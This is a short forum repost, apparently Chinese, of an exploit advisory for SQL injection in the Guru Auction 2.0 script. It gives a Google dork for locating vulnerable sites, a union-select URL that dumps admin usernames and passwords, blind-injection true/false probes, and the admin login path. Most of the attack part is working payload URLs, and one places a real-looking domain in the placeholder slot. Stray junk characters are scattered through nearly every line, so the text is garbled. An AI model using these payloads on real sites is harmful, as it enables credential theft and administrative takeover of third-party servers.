Guru Auction 2.0 Multiple SQL Injection Vulnerabilities& X( `. d3 R w) M% \: s9 I
1 w$ W9 j) s- |. D& ~8 u4 _7 `作者 : v3n0m% C9 ?, _0 B. f2 f
应用 : Guru Auction 2.01 b) E6 \- f8 p8 x+ ]
Price : $490 M9 T% ^. Q) z9 ?( p9 e* C$ ~. j
Vendor : http://www.guruscript.com/# ^% w5 Y/ X, M
Google Dork : inurl:subcat.php?cate_id=. k! y' y+ t( Q/ H- K9 R' R
$ s& z$ K2 J7 j/ ?* s) Y( @* }
SQLi p0c:6 y( D i/ o- }/ ]$ A& s2 s3 f
~~~~~~~~~~% R8 Y* V6 g( V( ]$ C0 ~$ c0 E, n4 F
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
6 l1 c8 ^) }+ L3 H: M a8 z/ B
6 @7 D7 }8 l O* ~
4 k( j( k1 [7 `! D5 X0 G& D盲注 p0c:
# H, Z' W: w: e" [~~~~~~~~~~
7 A' \/ F9 }- j# J% Q! Khttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true0 D% C2 ~, f) |
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
* L& v1 ~9 I: b4 T0 f6 ^" P* f 7 K$ J, Z. g) ^2 T: n0 B, r* u
管理登录入口:; r8 ^: \% }: Q# K
~~~~~~~~~~$ v1 f+ [3 M4 H$ Q% a
http://domain.tld/[path]/admin/
H+ ] Z0 `# ~$ E6 U+ ]4 F# T7 H; t' O |
发表于 2012-12-31 09:24:05
收藏
支持
反对